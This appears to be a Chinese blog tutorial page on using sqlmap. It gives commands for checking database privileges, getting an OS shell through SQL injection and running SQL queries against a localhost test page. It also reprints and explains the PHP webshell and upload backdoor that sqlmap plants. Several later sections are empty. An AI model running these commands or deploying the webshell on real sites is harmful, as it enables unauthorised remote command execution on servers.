<!DOCTYPE html>
<html lang>
  <head><meta name="generator" content="Hexo 3.9.0"><meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">


<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">

<meta name="theme-color" content="#f8f5ec">
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">

<meta name="description" content="SQLMAP 新手教程（二）"><link rel="alternate" href="/pwn4justice.github.io/atom.xml" title="J.A.R.V.I.S"><link rel="shortcut icon" type="image/x-icon" href="/pwn4justice.github.io/favicon.ico?v=2.11.0">
<link rel="canonical" href="https://pwn4justice.github.io/2019/07/02/SQLMAP-新手教程（二）/">

<link rel="stylesheet" type="text/css" href="/pwn4justice.github.io/lib/fancybox/jquery.fancybox.css"><link rel="stylesheet" type="text/css" href="/pwn4justice.github.io/lib/nprogress/nprogress.min.css">
<link rel="stylesheet" type="text/css" href="/pwn4justice.github.io/css/style.css?v=2.11.0">

<script id="baidu_push">
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
<script>
  window.config = {"leancloud":{"app_id":null,"app_key":null},"toc":true,"fancybox":true,"pjax":true,"latex":false};
</script>

    <title>SQLMAP 新手教程（二） - J.A.R.V.I.S</title>
  </head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/pwn4justice.github.io/." class="logo">J.A.R.V.I.S</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list"><a href="/pwn4justice.github.io/">
        <li class="mobile-menu-item">首页
          </li>
      </a><a href="/pwn4justice.github.io/categories/">
        <li class="mobile-menu-item">分类
          </li>
      </a><a href="/pwn4justice.github.io/about/">
        <li class="mobile-menu-item">关于
          </li>
      </a></ul>
</nav>
<div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/pwn4justice.github.io/." class="logo">J.A.R.V.I.S</a>
</div>

<nav class="site-navbar"><ul id="menu" class="menu"><li class="menu-item">
          <a class="menu-item-link" href="/pwn4justice.github.io/">
            首页
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/pwn4justice.github.io/categories/">
            分类
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/pwn4justice.github.io/about/">
            关于
            </a>
        </li>
      </ul></nav>
</header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content"><article class="post">
    <header class="post-header">
      <h1 class="post-title">SQLMAP 新手教程（二）
        </h1>

      <div class="post-meta">
        <span class="post-time">
          2019-07-02
        </span></div>
    </header>

    <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x00-SQLMAP-常见参数"><span class="toc-text">0x00 SQLMAP 常见参数</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-测试注入点权限"><span class="toc-text">(1) 测试注入点权限</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-执行shell命令"><span class="toc-text">(2) 执行shell命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-获取当前数据库名称"><span class="toc-text">(3) 获取当前数据库名称</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-执行SQL命令"><span class="toc-text">(4) 执行SQL命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-POST提交方式"><span class="toc-text">(5) POST提交方式</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#6-显示详细的注入等级（-level）"><span class="toc-text">(6) 显示详细的注入等级（--level）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#7-注入-HTTP-请求"><span class="toc-text">(7) 注入 HTTP 请求</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#8-将注入语句插入到指定位置"><span class="toc-text">(8) 将注入语句插入到指定位置</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#9-学会使用插件"><span class="toc-text">(9) 学会使用插件</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01-小结"><span class="toc-text">0x01 小结</span></a></li></ol>
    </div>
  </div><div class="post-content"><p>上一节：<a href="https://pwn4justice.github.io/pwn4justice.github.io/2019/06/11/SQLMAP-新手教程（一）/">SQLMAP 新手教程（一）</a><br>本节进一步介绍 SQLMAP 的常见使用。</p>
<a id="more"></a>

<h3 id="0x00-SQLMAP-常见参数"><a href="#0x00-SQLMAP-常见参数" class="headerlink" title="0x00 SQLMAP 常见参数"></a>0x00 SQLMAP 常见参数</h3><p><strong>注：</strong> SQLMAP 命令是区分大小写的</p>
<h4 id="1-测试注入点权限"><a href="#1-测试注入点权限" class="headerlink" title="(1) 测试注入点权限"></a>(1) 测试注入点权限</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http://localhost/diy/sqli.php?id=1&quot; --privileges</span><br><span class="line">// 测试 sa 用户权限（针对 SQL SERVER）</span><br><span class="line">sqlmap.py -u &quot;URL&quot; --privileges -U sa</span><br></pre></td></tr></table></figure>

<p>结果如图：</p>
<p><img src="privileges.jpg" alt="privileges"></p>
<br>

<h4 id="2-执行shell命令"><a href="#2-执行shell命令" class="headerlink" title="(2) 执行shell命令"></a>(2) 执行shell命令</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;URL&quot; --os-cmd=&quot;ping 127.0.0.1&quot;</span><br><span class="line">sqlmap.py -u &quot;URL&quot; --os-shell</span><br></pre></td></tr></table></figure>

<p>执行 <code>--os-cmd=&quot;ping xxx&quot;</code>的时候，首先会收到 SQLMAP 的提示，是否知道 web 应用的编程语言？此处选择 PHP，也是默认选项。然后 SQLMAP 识别了网站绝对路径，并且上传了2个临时的随机命名的 PHP 脚本文件（后门）至网站根目录，如图：</p>
<p><img src="language_upload.jpg" alt="language_upload"></p>
<p>接着会询问是否显示<strong>命令行标准输出</strong>，选择 Y：</p>
<p><img src="ping.jpg" alt="ping"></p>
<p>执行 <code>--os-shell</code> 的时候，除了上述那些内容外，还会反弹一个命令行 Shell，并且可以支持 Linux 命令（尽管服务器是 Win 系统）：</p>
<p><img src="cmd_shell.jpg" alt="cmd-shell"></p>
<p>来查看一下 SQLMAP 为我们创建的那两个后门文件的内容：</p>
<p><img src="door.jpg" alt="show_door"></p>
<p>找个网站格式化一下，终极内容如下：</p>
<p>code1.php：</p>
<p><img src="code1.jpg" alt="code"></p>
<p>和 code2.php：（虽然我也不知道为啥第二个文件开始要有 admin admin 这两个字段…）</p>
<p><img src="code2.jpg" alt="code"></p>
<p><strong>后门代码分析：</strong></p>
<p>主要函数：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br></pre></td></tr></table></figure>

<p>文件分析：</p>
<p><strong>code1.php :</strong></p>
<p>先是在开头设置了配置选项，并用 $c 来接受请求参数，也就是接受命令的地方，在“菜刀”中被称为口令？或者“密码”，whatever，使用 $z 来得到配置文件 禁止了哪些 高危函数，如果管理员设置了 <code>disable_functinos</code> 则用正则表达式等工具提取出已被禁用的函数，组成列表，方便上下文来查询某个命令是否可以执行。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$c = $_REQUEST[<span class="string">"cmd"</span>];</span><br><span class="line">@set_time_limit(<span class="number">0</span>);</span><br><span class="line">@ignore_user_abort(<span class="number">1</span>);</span><br><span class="line">@ini_set(<span class="string">"max_execution_time"</span>, <span class="number">0</span>);</span><br><span class="line">$z = @ini_get(<span class="string">"disable_functions"</span>);</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>($z)) &#123;</span><br><span class="line">        $z = preg_replace(<span class="string">"/[, ]+/"</span>, <span class="string">','</span>, $z);</span><br><span class="line">        $z = explode(<span class="string">','</span>, $z);</span><br><span class="line">        $z = array_map(<span class="string">"trim"</span>, $z);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        $z = <span class="keyword">array</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>f( $n )</code> 函数就是用来判断函数能不能被执行的，同时将命令末尾加上错误重定向：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$c = $c.<span class="string">" 2&gt;&amp;1"</span>;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">f</span><span class="params">($n)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">global</span> $z;</span><br><span class="line">        <span class="keyword">return</span> is_callable($n) <span class="keyword">and</span> ! in_array($n, $z);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>接下来就是一步一步测试哪个高危PHP函数（见:<a href="https://pwn4justice.github.io/pwn4justice.github.io/2019/07/01/高危PHP函数/">高危PHP函数列表</a>）没有被管理员禁止，并调用那个函数来执行系统命令：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (f(<span class="string">"system"</span>)) &#123;</span><br><span class="line">        ob_start();</span><br><span class="line">        system($c);</span><br><span class="line">        $w = ob_get_clean();</span><br><span class="line">&#125;<span class="keyword">elseif</span>(f(<span class="string">"proc_open"</span>)) &#123;</span><br><span class="line">        $y = proc_open($c, <span class="keyword">array</span>(<span class="keyword">array</span>(pipe, r), <span class="keyword">array</span>(pipe, w), <span class="keyword">array</span>(pipe, w)), $t);</span><br><span class="line">        $w = <span class="keyword">NULL</span>;</span><br><span class="line">        <span class="keyword">while</span> (!feof($t[<span class="number">1</span>])) &#123; $w. = fread($t[<span class="number">1</span>], <span class="number">512</span>); &#125;@proc_close($y);</span><br><span class="line">&#125;<span class="keyword">elseif</span>(f(<span class="string">"shell_exec"</span>)) &#123;</span><br><span class="line">        $w = shell_exec($c);</span><br><span class="line">&#125;<span class="keyword">elseif</span>(f(<span class="string">"passthru"</span>)) &#123;</span><br><span class="line">        ob_start();</span><br><span class="line">        passthru($c);</span><br><span class="line">        $w = ob_get_clean();</span><br><span class="line">&#125;<span class="keyword">elseif</span>(f(<span class="string">"popen"</span>)) &#123;</span><br><span class="line">        $x = popen($c, r);</span><br><span class="line">        $w = <span class="keyword">NULL</span>;</span><br><span class="line">        <span class="keyword">if</span> (is_resource($x)) &#123;</span><br><span class="line">                <span class="keyword">while</span> (!feof($x)) &#123; $w.= fread($x, <span class="number">512</span>); &#125;</span><br><span class="line">        &#125;@pclose($x);</span><br><span class="line">&#125;<span class="keyword">elseif</span>(f(<span class="string">"exec"</span>)) &#123;</span><br><span class="line">        $w = <span class="keyword">array</span>();</span><br><span class="line">        exec($c, $w);</span><br><span class="line">        $w = join(chr(<span class="number">10</span>), $w).chr(<span class="number">10</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123; $w = <span class="number">0</span>; &#125;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;pre&gt;$w"</span></span><br></pre></td></tr></table></figure>

<br>

<p><strong>code2.php</strong></p>
<p>这个 PHP 文件是用来处理上传的（小马？），应该是 SQLMAP 用来将上文那个 PHP webshell 文件上传至服务器，它构造了一个表单，并由 SQLMAP 填充需要上传的值：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;form action="</span>.$_SERVER[<span class="string">"PHP_SELF"</span>].<span class="string">" method=POST enctype=multipart/form-data&gt;&lt;input type=hidden name=MAX_FILE_SIZE value=1000000000&gt;&lt;b&gt;sqlmap file uploader&lt;/b&gt;&lt;br&gt;&lt;input name=file type=file&gt;&lt;br&gt;to directory: &lt;input type=text name=uploadDir value=D:\phpStudy5.2\WWW\&gt;&lt;input type=submit name=upload value=upload&gt;&lt;/form&gt;"</span>;</span><br></pre></td></tr></table></figure>

<p>对不同 PHP 版本的判断并上传：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_REQUEST[<span class="string">"upload"</span>])) &#123;</span><br><span class="line">        $dir = $_REQUEST[<span class="string">"uploadDir"</span>];</span><br><span class="line">        <span class="keyword">if</span> (phpversion() &lt; <span class="string">'4.1.0'</span>) &#123;</span><br><span class="line">                $file = $HTTP_POST_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>];</span><br><span class="line">				@move_uploaded_file($HTTP_POST_FILES[<span class="string">"file"</span>][<span class="string">"tmp_name"</span>], $dir.<span class="string">"/"</span>.$file) <span class="keyword">or</span> <span class="keyword">die</span>();</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                $file = $_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>];</span><br><span class="line">				@move_uploaded_file($_FILES[<span class="string">"file"</span>][<span class="string">"tmp_name"</span>], $dir.<span class="string">"/"</span>.$file) <span class="keyword">or</span> <span class="keyword">die</span>();</span><br><span class="line">        &#125;@chmod($dir.<span class="string">"/"</span>.$file, <span class="number">0755</span>);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"File uploaded"</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<br>

<h4 id="3-获取当前数据库名称"><a href="#3-获取当前数据库名称" class="headerlink" title="(3) 获取当前数据库名称"></a>(3) 获取当前数据库名称</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http://127.0.0.1/diy/sqli.php&quot; --current-db</span><br></pre></td></tr></table></figure>

<p><img src="currentdb.jpg" alt="currentdb"></p>
<br>

<h4 id="4-执行SQL命令"><a href="#4-执行SQL命令" class="headerlink" title="(4) 执行SQL命令"></a>(4) 执行SQL命令</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u &quot;http://127.0.0.1/diy/sqli.php&quot; --sql-shell</span><br><span class="line">sqlmap.py -u &quot;http://127.0.0.1/diy/sqli.php&quot; --sql-query=&quot;sql&quot;</span><br></pre></td></tr></table></figure>

<br>

<h4 id="5-POST提交方式"><a href="#5-POST提交方式" class="headerlink" title="(5) POST提交方式"></a>(5) POST提交方式</h4><br>

<h4 id="6-显示详细的注入等级（-level）"><a href="#6-显示详细的注入等级（-level）" class="headerlink" title="(6) 显示详细的注入等级（--level）"></a>(6) 显示详细的注入等级（--level）</h4><br>

<h4 id="7-注入-HTTP-请求"><a href="#7-注入-HTTP-请求" class="headerlink" title="(7) 注入 HTTP 请求"></a>(7) 注入 HTTP 请求</h4><br>

<h4 id="8-将注入语句插入到指定位置"><a href="#8-将注入语句插入到指定位置" class="headerlink" title="(8) 将注入语句插入到指定位置"></a>(8) 将注入语句插入到指定位置</h4><br>

<h4 id="9-学会使用插件"><a href="#9-学会使用插件" class="headerlink" title="(9) 学会使用插件"></a>(9) 学会使用插件</h4><p>其他更多使用，可以参考：<code>https://www.cnblogs.com/dgjnszf/p/10808125.html</code></p>
<br>

<h3 id="0x01-小结"><a href="#0x01-小结" class="headerlink" title="0x01 小结"></a>0x01 小结</h3>
      </div>
      <div class="post-copyright">
    <p class="copyright-item">
      <span>原文作者: </span>
      <a href="https://pwn4justice.github.io">pwn4justice</a>
    </p>
    <p class="copyright-item">
      <span>原文链接: </span>
      <a href="https://pwn4justice.github.io/2019/07/02/SQLMAP-新手教程（二）/">https://pwn4justice.github.io/2019/07/02/SQLMAP-新手教程（二）/</a>
    </p>
    <p class="copyright-item">
      <span>License: </span><a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/" target="_blank">知识共享署名-非商业性使用 4.0 国际许可协议</a>
    </p>
  </div>
      <footer class="post-footer">
        
        <nav class="post-nav"><a class="prev" href="/pwn4justice.github.io/2019/07/07/XPath-学习（一）/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">XPath 学习（一）</span>
        <span class="prev-text nav-mobile">上一篇</span>
      </a>
    <a class="next" href="/pwn4justice.github.io/2019/07/01/高危PHP函数/">
        <span class="next-text nav-default">高危PHP函数</span>
        <span class="prev-text nav-mobile">下一篇</span>
        <i class="iconfont icon-right"></i>
      </a>
    </nav></footer>
    </article></div><div class="comments" id="comments"><div id="vcomments"></div>
    </div></div>
      </main>

      <footer id="footer" class="footer"><div class="social-links"><a href="mailto:bin.ring0@foxmail.com" class="iconfont icon-email" title="email"></a>
        <a href="https://github.com/pwn4justice" class="iconfont icon-github" title="github"></a>
        <a href="/pwn4justice.github.io/atom.xml" class="iconfont icon-rss" title="rss"></a>
    </div><div class="copyright">
  <span class="power-by">
    由 <a class="hexo-link" href="https://hexo.io/">Hexo</a> 强力驱动
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    主题 - 
    <a class="theme-link" href="https://github.com/ahonn/hexo-theme-even">Even</a>
  </span>

  <span class="copyright-year">&copy;2019<span class="heart">
      <i class="iconfont icon-heart"></i>
    </span>
    <span class="author">pwn4justice</span>
  </span>
</div>
</footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div><!-- valine Comments: add by pwn4justice at 0:19 2019/7/15 -->
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/xcss/valine@v1.2.0/dist/Valine.min.js"></script>
  <script type="text/javascript">
	new Valine({
		el: '#vcomments',
		notify: false,
		verify: false,
		app_id: "c0QrSCsFudA3BmlYdMzo2VwF-MdYXbMMI",
		app_key: "488SWS1mtwysEQnDRnqDDRXH",
		placeholder: "Give me some advise ...",
		avatar: 'mm',
		visitor: true		<!-- add by me -->
	});
  </script>
  <!-- origin value:"cdn.jsdelivr.net/gh/xcss/valine@v1.1.7/dist/Valine.min.js" --><script type="text/javascript" src="/pwn4justice.github.io/lib/jquery/jquery.min.js"></script>
  <script type="text/javascript" src="/pwn4justice.github.io/lib/slideout/slideout.js"></script>
  <script type="text/javascript" src="/pwn4justice.github.io/lib/fancybox/jquery.fancybox.pack.js"></script>
  <script type="text/javascript" src="/pwn4justice.github.io/lib/pjax/jquery.pjax.min.js"></script>
  <script type="text/javascript" src="/pwn4justice.github.io/lib/nprogress/nprogress.min.js"></script>
  <script type="text/javascript" src="/pwn4justice.github.io/js/src/even.js?v=2.11.0"></script>
</body>
</html>
